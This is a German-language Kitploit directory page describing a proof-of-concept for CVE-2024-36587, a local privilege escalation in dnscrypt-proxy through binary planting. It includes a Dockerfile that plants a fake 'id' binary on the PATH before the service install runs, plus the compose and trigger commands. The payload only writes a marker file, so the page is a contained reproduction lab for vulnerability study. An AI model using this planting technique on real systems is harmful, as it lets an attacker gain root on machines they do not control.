Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-36587 — Proof-of-Concept-Exploit für CVE-2024-36587, der eine lokale Privilegieneskalation in dnscrypt-proxy mittels Binary Planting demonstriert, mit einer Docker-basierten Reproduktionsumgebung. | Kitploit
Tools/GitHubGitHub/meeeeing/cve-2024-36587
Privilege EscalationContainer-SicherheitSchwachstellenanalyseExploitationPenetrationstestsBinary-Exploitation
GitHubmeeeeing/cve-2024-36587

CVE-2024-36587

Proof-of-Concept-Exploit für CVE-2024-36587, der eine lokale Privilegieneskalation in dnscrypt-proxy mittels Binary Planting demonstriert, mit einer Docker-basierten Reproduktionsumgebung.

Repository anzeigen
vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-36587 - dnscrypt-proxy Local Privilege Escalation

Übersicht

  • Beschreibung der Schwachstelle: Aufgrund eines Problems, bei dem der dnscrypt-proxy-Dienst bei der Installation die ausführbaren Dateien im aktuellen Verzeichnis vertrauenswürdig registriert, kann durch Einschleusen einer schädlichen Binärdatei eine Privilegieneskalation erreicht werden.
  • Betroffene Versionen: dnscrypt-proxy v2.0.0-alpha9 ~ v2.1.5
  • PoC-Methode: Binary Planting

Umgebungskonfiguration

root@kitploit:~
docker compose up --build

Nach erfolgreichem Build und Start wird ein Container erstellt.

Zugriff auf den Container:

root@kitploit:~
docker run -it --privileged dnscrypt-poc-poc bash

Auslösen der Schwachstelle

Im Container:

root@kitploit:~
/tmp/id
cat /tmp/poc_was_here

Wenn Pwned_from_Docker ausgegeben wird, war der PoC erfolgreich.

Konfigurationsdateien

Dockerfile

root@kitploit:~
FROM ubuntu:24.04

RUN apt-get update && apt-get install -y \
    git \
    golang-go \
    sudo

WORKDIR /workspace

RUN git clone https://github.com/DNSCrypt/dnscrypt-proxy.git && \
    cd dnscrypt-proxy && \
    git checkout tags/2.1.0 && \
    go build -o proxy ./dnscrypt-proxy

RUN bash -c 'echo -e "#!/bin/bash\necho Pwned_from_Docker > /tmp/poc_was_here" > /tmp/id' && \
    chmod +x /tmp/id && \
    ln -sf /tmp/id /usr/local/bin/id

CMD ["./dnscrypt-proxy/proxy", "-service", "install"]

docker-compose.yaml

root@kitploit:~
version: "3.8"

services:
  poc:
    build: .
    container_name: dnscrypt-poc
    privileged: true
    tty: true

Referenzen

  • https://github.com/DNSCrypt/dnscrypt-proxy
  • https://nvd.nist.gov/vuln/detail/CVE-2024-36587

Screenshot des Übungsergebnisses

docker build success

Ausführlicher Bericht

Für eine detailliertere Analyse und die Übungsergebnisse siehe das folgende PDF-Dokument:

PoC_Report_CVE-2024-36587.pdf

Tool herunterladen